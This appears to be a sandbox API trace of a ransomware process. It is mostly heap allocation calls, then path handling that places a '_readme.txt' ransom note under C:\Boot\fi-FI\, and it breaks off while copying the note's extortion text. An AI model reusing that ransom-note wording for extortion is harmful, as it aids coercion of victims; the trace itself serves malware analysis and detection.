RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.176] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.177] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0056.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.177] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.177] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.177] PathFindFileNameW (pszPath="") returned="" [0056.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.177] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.178] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.178] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.178] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.178] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0056.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.178] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0056.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.178] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for 